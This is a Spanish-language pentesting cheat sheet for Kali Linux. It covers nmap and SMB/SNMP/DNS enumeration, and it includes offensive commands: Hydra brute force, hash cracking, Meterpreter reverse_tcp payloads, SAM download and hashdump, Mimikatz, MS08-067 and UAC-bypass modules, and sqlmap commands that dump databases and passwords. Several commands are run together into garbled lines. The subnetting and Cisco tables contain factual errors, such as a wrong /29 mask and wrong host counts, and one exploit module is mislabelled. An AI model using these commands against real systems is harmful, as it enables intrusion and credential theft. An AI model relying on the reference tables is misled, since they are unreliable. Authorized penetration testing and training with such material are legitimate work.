El pentesting es la práctica del testeo en sistemas, redes, aplicaciones web… con la finalidad de encontrar vulnerabilidades que un atacante pueda explotar.

A continuación expondremos una cheatsheet (documento para recordar diferentes utilidades) para pentesters que utilizan Kali Linux. El mismo contiene un resumen de las herramientas más importantes que se suelen usar en test de penetración. Algunas de ellas son nmap, sqlmap, ipv4, enumeracion, etc.

Estos parámetros pueden variar dependiendo del sistema operativo que esten usando y la versión de la herramienta. Pero si estan usando Kali-Linux, deberia funcionarles sin problemas.

Reconocimiento y enumeración.

Comandos NMAP.

Nmap (“Mapeador de redes”) es una herramienta open source que sirve para auditar la seguridad en redes. Algunos administradores de redes la encuentran útil para ver las máquinas de la red, servicios instalados y sus versiones. NMAP utiliza algo llamado Paquetes IP, de forma que determina que hosts hay disponibles en la red, que servicios (nombre de la aplicación y versión), el sistema operativo. Además indica que puertos estan filtrados o tras un firewall, entre otras características.

Corre en todas las computadoras y esta disponible tanto para Linux, como para Windows y Mac OS X

 

Comando Descripción
nmap -v -sS -A -T4 target Escanear en modo verbose (-v), -sS (analiza paquetes TCP syn), -A (detección de servicios y versiones).
nmap -v -sS -p–A -T4 target Escanea todos los puertos TCP.
nmap -v -sU -sS -p- -A -T4 target Escanea todos los puertos TCP y UDP (Puede demorar unos minutos).
nmap -v -p 445 –script=smb-check-vulns
–script-args=unsafe=1 192.168.1.X
Comando para escanear servidores vulnerables a SMB. Advertencia: el parámetro unsafe=1 puede causar una caida de la conexión.
ls /usr/share/nmap/scripts/* | grep ftp Buscar palabras claves en el script de NMAP.

Guía completa de NMAP

Enumeración SMB.

En redes de computadoras el Servidor de Mensajes en Bloques (SMB) es una versión de lo que fué conocido como Sistema de Archivos Comunes en Internet (CIFS/SIFS), opera como protocolo de red basado en capa de aplicación principamente utilizado para proveer acceso compartido a archivos, impresoras, puertos series y comunicaciones miscelaneas entre nodos en una red.

Comando Descripción
nbtscan 192.168.1.0/24 Permite descubrir servidores Windows/Samba en una subred, direcciones MAC en Windows, nombres de NetBios y descubrir clientes de Grupos de Trabajo/Dominios.
enum4linux -a target-ip Corre todas las opciones (encontrar clientes de Dominio/Grupo de Trabajo en Windows) aparte de utilizar diccionarios para adivinar nombres compartidos.

Otros métodos de descubrimiento de hosts.

Otros métodos para descubrimiento de hosts sin usar Nmap.

Comando Descripción
netdiscover -r 192.168.1.0/24 Descubre IP, direcciones MAC y fabricante MAC en la misma subred desde la tabla ARP, útil para confirmar que se encuentra en la correcta VLAN del sitio del cliente.

Enumerración SMB.

Enumera servicios compartidos Windows/Samba.

Comando Descripción
nbtscan 192.168.1.0/24 Descubre servidores Windows/Samba en una subred, encontrando direcciones MAC en windows y NetBios como también descubre clientes de Dominio/Grupo de Trabajo.
enum4linux -a target-ip Realiza todo, corre todas las opciones (encontrar Clientes de Dominio/Grupo de Trabajo en Windows) aparte de utilizar diccionarios diccionarios para adivinar nombres compartidos.

Servidor Web Local Python.

Servidor Web Local de comandos Python, práctico para Shells y Exploits en una maquina de ataque.

Comando Descripción
python -m SimpleHTTPServer 80 Ejecuta un servidor HTTP básico, útil para alojar Shells y Exploits.

Montar Archivos Compartidos.

Como montar NFS/CIFS en Windows y Linux.

Comando Descripción
mount 192.168.1.1:/vol/share /mnt/nfs Monta una carpeta o volúmen en /mnt/nfs
mount -t cifs -o username=user,password=pass
,domain=blah //192.168.1.X/share-name /mnt/cifs
Montar carpeta o volúmen Windows CIFS/SMB  en Linux /mnt/cifs si quita la contraseña preguntará en la consola de comandos (más seguro para no registrar en bash_history).
net use Z: \\win-server\share password
/user:domain\janedoe /savecred /p:no
Montar una carpeta o servicio compartido en Windows desde la consola de comandos.
apt-get install smb4k -y Instala smb4k en Kali, útil en el entorno gráfico de Linux para explorar servicios compartidos SMB.

Descubrir Servicios (FingerPrinting) Básico.

Un dispositivo/máquina/navegador Descubridor de Servicios es útil para recopilar información sobre un dispositivo remoto con el proposito de identificarlo.
Descubrir Servicios puede ser utilizado total o parcialmente para identificar usuarios o dispositivos individuales aún cuando las cookies están desactivadas.

Comando Descripción
nc -v 192.168.1.1 25telnet 192.168.1.1 25 Realiza un básico Versionado/Identificador de Servicios mediante un banner.

Enumeración SNMP.

La enumeración SNMP es el proceso de utilizar el protocolo SNMP para enumerar cuentas de usuario en un objetivo.
Emplea dos tipos de componentes Software para la comunicación: el agente SNMP el cual está ubicado en el dispositivo de red y el SNMP administrador, el cual se comunica con el agente.

Comando Descripción
snmpcheck -t 192.168.1.X -c publicsnmpwalk -c public -v1 192.168.1.X 1|
grep hrSWRunName|cut -d* * -fsnmpenum -t 192.168.1.Xonesixtyone -c names -i hosts
Enumeración SNMP.

Transferencia de Zonas DNS.

Comando Descripción
nslookup -> set type=any -> ls -d blah.com Transferencia de Zona DNS utilizando Windows.
dig axfr blah.com @ns1.blah.com Transferencia de Zona DNS utilizando Linux.

DNSRecon.

DNSRecon dá la posibilidad de:

  1. Comprobar todos los Registros NS para transferencias de Zonas.
  2. Enumera Registros DNS General para un determinado Dominio (MX, SOA, NS, A, AAAA, SPF y TXT)
  3. Realiza una Enumeracion de Registros SRV común. En el Top-Level-Domain (TLD)
  4. Verifica por resolución con comodines.
  5. Fuerza bruta a subdominios y  a los registros de host A y AAAA proporcionando un dominio y un diccionario.
  6. Realiza una búsqueda de registros PTR para un Rango IP/CIDR dado.
  7. Verifica registros en la cache del servidor DNS para registros A/AAAA/CNAME previsto en una lista de registros del host en un archivo TXT a comprobar.
  8. Enumerar registros mDNS Comunes en la enumeración local de red y subdominios utilizando Google.

Servidor Web de Enumeración HTTP/HTTPS.

Comando Descripción
nikto -h 192.168.1.1 Realiza un escaneo con NIKTO contra el objetivo.
dirbuster Configurar mediante interfaz grágica, la línea de comandos la mayor parte del tiempo no funciona.

Inspección de paquetes.

Comando Descripción
tcpdump tcp port 80 -w output.pcap -i eth0 tcpdump por el puerto 80 en la interfaz eth0, con salida a output.pcap

Enumeración de usuarios.

Algunas técnicas para enumerar remotamente usuarios de un sistema.

Enumeración de usuarios SMB.

Comando Descripción
python /usr/share/doc/python-impacket-doc/examples
/samrdump.py 192.168.XXX.XXX
Enumerar usuarios de  SMB.
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt RID cycle SMB / Enumerar usuarios de SMB.

Enumeración de usuarios SNMP.

Comando Descripción
snmpwalk public -v1 192.168.X.XXX 1 |grep 77.1.2.25
|cut -d” “ -f4
Enumerar usuarios de SNMP.
python /usr/share/doc/python-impacket-doc/examples/
samrdump.py SNMP 192.168.X.XXX
Enumerar usuarios de SNMP.
nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt
(then grep)
Busca servidores SNMP con Nmap, grepable output

Contraseñas.

Diccionarios.

Comando Descripción
/usr/share/wordlists Diccionarios de Kali.

Más diccionarios aquí: g0tm1lk’s blog

Servicios de Fuerza Bruta.

Hydra FTP Fuerza Bruta.

Hydra es un crackeador de inicios de sesión, soporta varios protocolos a atacar. Es rápido y flexible los nuevos módulos son faciles de añadir. Esta herramienta brinda la posibilidad a consultores de seguridad e investigadores verificar lo sencillo que resulta obtener acceso no autorizado a un sistema.
En Ubuntu puede instalarse desde el gestor de paquetes Synaptic.
En Kali, se encuentra instalado.

Comando Descripción
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f
192.168.X.XXX ftp -V
Fuerza bruta a FTP con Hydra.

Hydra POP3 Fuerza Bruta.

Comando Descripción
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f
192.168.X.XXX pop3 -V
Fuerza bruta a POP3  con hydra.

Hydra SMTP Fuerza Bruta.

Comando Descripción
hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp -V Fuerza bruta a SMTP con Hydra.

Usa -t para limitar el número de conexiones, ejemplo: -t 15

Guía de crackeo de contraseñas con Hydra  aquí

Como romper SSH con Hydra

Crackeo de contraseñas.

John The Ripper – JTR.

Jhon the Ripper es diferente a otras herramientas como Hydra.
Hydra realiza ataques Blind-Brute-Force utilizando combinaciones de Nombre de Usuarios/Contraseñas en un servidor FTP/SSH/Telnet.
Sin embargo Jhon necesita primero el HASH. El mayor desafio para un Hacker es ser el primero en obtener el HASH que será crackeado.
Hoy en día los HASH son crackeables de forma más rapida con el uso de las Rainbow-Tables. Dirigiendose a algún sitio que contenga Rainbow-Tables en línea, enviando el HASH y si coincide el sitio podría mostrar el resultado casi de forma inmediata.
Las Rainbow-Tables basicamente almacenan palabras comunes y sus HASH en una base de datos. Al ser mas grande la base de datos, más palabras abarca.

Comando. Descripción
john –wordlist=/usr/share/wordlists/rockyou.txt hashes JTR crackeo de contraeñas.
john –format=descrypt –wordlist
/usr/share/wordlists/rockyou.txt hash.txt
JTR crackea utilizando una lista de palabras.
john –format=descrypt hash –show JTR crackea mediante fuerza bruta.

Crackear contraseñas utilizando la guia de JTR

Investigando Exploits.

Formas de encontrar Exploits para Servicios/Host enumerados.

Command Description
searchsploit windows 2003 | grep -i local Busca en exploit-db un exploit. En este ejemplo es para escalar privilegios en Windows 2003.
site:exploit-db.com exploit kernel <= 3 Utiliza Google para buscar en exploit-db.com un exploit.
grep -R “W7” /usr/share/metasploit-framework
/modules/exploit/windows/*
Busca módulos en MetaSploit utilizando GREP.

Guia completa con capturas de pantallas para buscar Exploits here

Compilando Exploits

Identificando si el código C es para Windows o Linux.

C# indicará que Sistema Operativo debe ser utilizado para construir el Exploit.

Comando Descripción
process.h, string.h, winbase.h, windows.h, winsock2.h Código de Exploit en Windows.
arpa/inet.h, fcntl.h, netdb.h, netinet/in.h,
sys/sockt.h, sys/types.h, unistd.h
Código de Exploit en Linux.

Construyendo un Exploit con GCC

Compilar un exploit con Gcc.

Comando Descripción
gcc -o exploit exploit.c Compilación básica con GCC.

Compilar en Kali 64Bit un exploit para 32Bit con GCC

Util para compilaciones cruzadas de binarios en 32Bit en una maquina de 64Bit.

Comando Descripción
gcc -m32 exploit.c -o exploit Compilación cruzada de un binario de 32Bit en un Linux de 64Bit.

Compilar un .exe en Linux

Construir/compilar exploits para Windows en Linux, resultando en un archivo .exe

Comando Descripción
i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe Compilar .exe en Linux.

Binario SUID

A veces los archivos binarios C SUID son requeridos para obtener una Shell como SuperUsuario, actualizando el UID/GID y la shell son requeridos.
Debajo hay algunos ejemplos rápidos de varias shells:

SUID C Shell para/bin/bash


SUID C Shell para /bin/sh


Construyendo el binario para la Shell SUID


Para 32 bit:


TTY Shells.

Trucos para obtener una TTY-Shell desde una shell limitada; útil para lanzar comandos como “SU” desde shells reversas.

TTY-Shell en Python.



Obtener una Shell-Interactiva.


Obtener una Shell-TTY con Perl.


Obtener una Shell-TTY con Ruby.


Obtener una Shell-TTY con Lua.


Obtener una Shell-TTY desde el editor Vi.

Lanzar comandos en la shell desde Vi:


Obtener una Shel-TTY con Nmap.


Metasploit

Metasploit fue creado por H.D.Moore en 2003 como una herramienta de red portable usando Perl. En el 2007, el Framework de Metasploit fue totalmente re-escrito en Ruby. El 21 de Octubre de 2009, el proyecto Metasploit anunció que fue adquirido por Rapid7, una compañia de seguridad que provee soluciones centralizadas y unificadas de vulnerabilidad.

Al ser un producto comercial comparable a Immunity’s Canvas o Core Security Tecnologies o Core Impact, Metasploit puede ser utilizado para verificar la vulnerabilidad de un sistema o para penetrar en sistemas remotos. Como muchas herramientas de seguridad para obtener información, Metasploit puede utilizarse para legitimar y desautorizar actividades. Desde la adquisición del Framework Metasploit, Rapid7 a añadido dos ediciones propietarias llamadas Metasploit Express y Metasploit Pro.

La posición emergente de Metasploit como marco de desarrollo de la explotación hacia la publicación de avisos de vulnerabilidades en el software a veces acompañado por un modulo de terceros para Metasploit que resalta la explotabilidad, riesgo y corrección del bug.
Metasploit 3.0 comenzó a incluir herramientas de ofuscación, usadas para descubrir vulnerabilidades en el software, mas bien para explotar los bugs conocidos.
Metasploit 3.0 incluye una intergración de herramientas Lorcon para Wireless (802.11) publicado en Noviembre del 2006.
Metasploit 4.0 fue lanzado en Agosto del 2011.

Meterpreter Payloads.

Windows reverse meterpreter payload.

Comando Descripción
set payload windows/meterpreter/reverse_tcp Windows reverse tcp payload.

Windows VNC Meterpreter payload.

Comando Descripción
set payload windows/vncinject/reverse_tcpset ViewOnly false Meterpreter Windows VNC Payload.

Linux Reverse Meterpreter payload.

Comando Descripción
set payload linux/meterpreter/reverse_tcp Meterpreter Linux Reverse Payload.

Trucos Meterpreter.

Comandos útiles de meterpreter.

Comando Descripción
upload file c:\\windows Meterpreter para subir archivo a un objetivo Windows.
download c:\\windows\\repair\\sam /tmp Meterpreter para bajar archivo desde un objetivo Windows.
download c:\\windows\\repair\\sam /tmp Meterpreter download file from Windows target
execute -f c:\\windows\temp\exploit.exe Lanzar un .exe Meterpreter en el objetivo (útil para ejecutar exploits subidos).
execute -f cmd -c Crear nuevos canales con la Shell-Cmd.
ps Meterpreter muestra los procesos.
shell Meterpreter obtiene una shell en el objetivo.
getsystem Meterpreter intenta escalar privilegios en el objetivo.
hashdump Meterpreter intenta volcar los hashes en el objetivo.
portfwd add –l 3389 –p 3389 –r target Meterpreter crea una redirección de puertos hacia el objetivo.
portfwd delete –l 3389 –p 3389 –r target Meterpreter elimina la redirección de puertos.

Módulos comunes de Metasploit.

Exploits Remotos para Windows (exploits).

Comando Descripción
use exploit/windows/smb/ms08_067_netapi MS08_067 Windows 2k, XP, 2003 Remote Exploit
use exploit/windows/dcerpc/ms06_040_netapi MS08_040 Windows NT, 2k, XP, 2003 Remote Exploit
use exploit/windows/smb/
ms09_050_smb2_negotiate_func_index
MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit

Exploits Locales para Windows (exploits).

Comando Descripción
use exploit/windows/local/bypassuac Bypass UAC on Windows 7 + Set target + arch, x86/64

Módulos Auxiliares de Metasploit.

Comando Descripción
use auxiliary/scanner/http/dir_scanner Módulo escaner de directorios HTTP.
use auxiliary/scanner/http/jboss_vulnscan Módulo escaner de vulnerabilidades JBOSS.
use auxiliary/scanner/mssql/mssql_login Módulo escaner de credencial MSSQL.
use auxiliary/scanner/mysql/mysql_version Módulo escaner de versión MSSQL.
use auxiliary/scanner/oracle/oracle_login Módulo de login para Oracle.

Modulos de Metasploit para Powershell.

Comandos Descripción
use exploit/multi/script/web_delivery Módulo de entrega del Payload para Powershell.
post/windows/manage/powershell/exec_powershell Módulo para subir y ejecutar una powershell a traves de una sesión.
use exploit/multi/http/jboss_maindeployer Módulo para desarrollar JBOSS.
use exploit/windows/mssql/mssql_payload Módulo para MSSQL.

Módulos Metasploit para la Post-Explotación en Windows.

Comandos Descripción
run post/windows/gather/win_privs Muestra los privilegios del usuario actual.
use post/windows/gather/credentials/gpp Módulo grab GPP para guardar contraseñas.
load mimikatz -> wdigest Módulo para cargar Mimikatz.
run post/windows/gather/local_admin_search_enum Identificar otros equipos indicando el nombre de usuario del dominio muestra el acceso administrativo que tiene.

Redes.

Identificando Servicios TTL.

Sistema Operativo Tamaño TTL
Windows 128
Linux 64
Solaris 255
Cisco / Network 255

IPv4

Clase de rangos IP.

Ejemplo: Clasae A,B,C.

Clase Rango de direcciones IP
Class A IP Address Range 0.0.0.0 – 127.255.255.255
Class B IP Address Range 128.0.0.0 – 191.255.255.255
Class C IP Address Range 192.0.0.0 – 223.255.255.255
Class D IP Address Range 224.0.0.0 – 239.255.255.255
Class E IP Address Range 240.0.0.0 – 255.255.255.255

Rango de direcciones IPv4 privadas.

Clase Rango
Class A Private Address Range 10.0.0.0 – 10.255.255.255
Class B Private Address Range 172.16.0.0 – 172.31.255.255
Class C Private Address Range 192.168.0.0 – 192.168.255.255
127.0.0.0 – 127.255.255.255

Subneteo IPv4.

CIDR Máscara de subred en decimal. Numeros de Hosts.
/31 255.255.255.254 1 Host
/30 255.255.255.252 2 Hosts
/29 255.255.255.249 6 Hosts
/28 255.255.255.240 14 Hosts
/27 255.255.255.224 30 Hosts
/26 255.255.255.192 62 Hosts
/25 255.255.255.128 126 Hosts
/24 255.255.255.0 254 Hosts
/23 255.255.254.0 512 Host
/22 255.255.252.0 1022 Hosts
/21 255.255.248.0 2046 Hosts
/20 255.255.240.0 4094 Hosts
/19 255.255.224.0 8190 Hosts
/18 255.255.192.0 16382 Hosts
/17 255.255.128.0 32766 Hosts
/16 255.255.0.0 65534 Hosts
/15 255.254.0.0 131070 Hosts
/14 255.252.0.0 262142 Hosts
/13 255.248.0.0 524286 Hosts
/12 255.240.0.0 1048674 Hosts
/11 255.224.0.0 2097150 Hosts
/10 255.192.0.0 4194302 Hosts
/9 255.128.0.0 8388606 Hosts
/8 255.0.0.0 16777214 Hosts

Tabla ASCII

Util para Testeos de Intrusión en Aplicaciones Web.

ASCII Caracter
x00 Null Byte
x08 BS
x09 TAB
x0a LF
x0d CR
x1b ESC
x20 SPC
x21 !
x22
x23 #
x24 $
x25 %
x26 &
x27
x28 (
x29 )
x2a *
x2b +
x2c ,
x2d
x2e .
x2f /
x30 0
x31 1
x32 2
x33 3
x34 4
x35 5
x36 6
x37 7
x38 8
x39 9
x3a :
x3b ;
x3c <
x3d =
x3e >
x3f ?
x40 @
x41 A
x42 B
x43 C
x44 D
x45 E
x46 F
x47 G
x48 H
x49 I
x4a J
x4b K
x4c L
x4d M
x4e N
x4f O
x50 P
x51 Q
x52 R
x53 S
x54 T
x55 U
x56 V
x57 W
x58 X
x59 Y
x5a Z
x5b [
x5c \
x5d ]
x5e ^
x5f _
x60
x61 a
x62 b
x63 c
x64 d
x65 e
x66 f
x67 g
x68 h
x69 i
x6a j
x6b k
x6c l
x6d m
x6e n
x6f o
x70 p
x71 q
x72 r
x73 s
x74 t
x75 u
x76 v
x77 w
x78 x
x79 y
x7a z

Comandos CISCO-IOS.

Coleccion de comandos útiles para Cisco IOS.

Comando Descripción
enable Ingresa al modo de configuración.
conf t Modo corto para configurar mediante terminal.
(config)# interface fa0/0 Configurar FastEthernet 0/0
(config-if)# ip addr 0.0.0.0 255.255.255.255 Asigna ip  a fa0/0
(config-if)# ip addr 0.0.0.0 255.255.255.255 Asigna ip a  fa0/0
(config-if)# line vty 0 4 Configura linea VTY.
(config-line)# login Cisco set telnet password
(config-line)# password YOUR-PASSWORD Establecer contraeña para Telnet.
# show running-config Muestra el running-config cargado en memoria.
# show startup-config Muestra la configuración del inicio.
# show version Muestra la versión IOS de Cisco.
# show session Muestra las sesiones abiertas.
# show ip interface Muestra la dirección Ip de las interfaces.
# show interface e0 Muestra información detallada de la interfaz e0.
# show ip route Muestra las tablas de rutas.
# show access-lists Muestra el access-list.
# dir file systems Muestra los archivos del sistema.
# dir all-filesystems Muestra todos los archivos del sistema.
# dir /all Muestra archivos eliminados.
# terminal length 0 Salida de la terminal sin límite (cache).
# copy running-config tftp Copia la running-config a un servidor tftp.
# copy running-config startup-config Copia la startup-config a la running-config.

Criptografía.

Longitud de Hash.

Hash Tamaño
MD5 Hash Length 16 Bytes
SHA-1 Hash Length 20 Bytes
SHA-256 Hash Length 32 Bytes
SHA-512 Hash Length 64 Bytes

Ejemplos de Hash.

hash-identifier permite identificar el tipo de hash, la siguiente lista contiene numerosos ejemplos:

Hash Ejemplo
MD5 Hash 8743b52063cd84097a65d1633f5c74f5
MD5 $PASS:$SALT 01dfae6e5d4d90d9892622325959afbe:7050461
MD5 $SALT:$PASS f0fda58630310a6dd91a7d8f0a4ceda2:4225637426
SHA1 Hash b89eaac7e61417341b710b727768294d0e6a277b
SHA1 $PASS:$SALT 2fc5a684737ce1bf7b3b239df432416e0dd07357:2014
SHA1 $SALT:$PASS cac35ec206d868b7d7cb0b55f31d9425b075082b:5363620024
SHA-256 127e6fbfe24a750e72930c220a8e138275656b
8e5d8f48a98c3c92df2caba935
SHA-256 $PASS:$SALT c73d08de890479518ed60cf670d17faa26a4a7
1f995c1dcc978165399401a6c4
SHA-256 $SALT:$PASS eb368a2dfd38b405f014118c7d9747fcc97f4
f0ee75c05963cd9da6ee65ef498:560407001617
SHA-512 82a9dda829eb7f8ffe9fbe49e45d47d2dad9
664fbb7adf72492e3c81ebd3e29134d9bc
12212bf83c6840f10e8246b9db54a4
859b7ccd0123d86e5872c1e5082f
SHA-512 $PASS:$SALT e5c3ede3e49fb86592fb03f471c35ba13e8
d89b8ab65142c9a8fdafb635fa2223c24e5
558fd9313e8995019dcbec1fb58414
6b7bb12685c7765fc8c0d51379fd
SHA-512 $SALT:$PASS 976b451818634a1e2acba682da3fd6ef
a72adf8a7a08d7939550c244b237c72c7d4236754
4e826c0c83fe5c02f97c0373b6b1
386cc794bf0d21d2df01bb9c08a
NTLM Hash b4b9b02e6f09a9bd760f388b67351e2b

Guía de identificación de HASH y cracking de contraseñas con Wireshark aquí

Ejemplos de SQLMap.

Sqlmap es una herramienta open source para tests de penetración que automatiza el proceso de detección y explotación de vulnerabilidades de inyección SQL y la apropiación de servidores de bases de datos.

Tiene un potente motor de detección, muchas características actualizadas y una amplia gama de opciones que van desde la identificación de la base de datos, recolección de datos, acceso al sistema de archivos y la ejecución de comandos en el sistema operativo de forma remota.

Comando Descripción
sqlmap -u http://meh.com –forms –batch –crawl=10
–cookie=jsessionid=54321 –level=5 –risk=3
Escaner automático.
sqlmap -u TARGET -p PARAM –data=POSTDATA –cookie=COOKIE
–level=3 –current-user –current-db –passwords
–file-read=”/var/www/blah.php”
Escanear un objetivo determinado.
sqlmap -u “http://meh.com/meh.php?id=1”
–dbms=mysql –tech=U –random-agent –dump
Escaneo de url para inyecciones union + error based con mysql como
backend y usando un user agent aleatorio + database dump
sqlmap -o -u “http://meh.com/form/” –forms Verifica un formulario para una inyección con SqlMap.
sqlmap -o -u “http://meh/vuln-form” –forms
-D database-name -T users –dump
Mostrar y crackear los hashs para la tabla usuarios en la base de datos.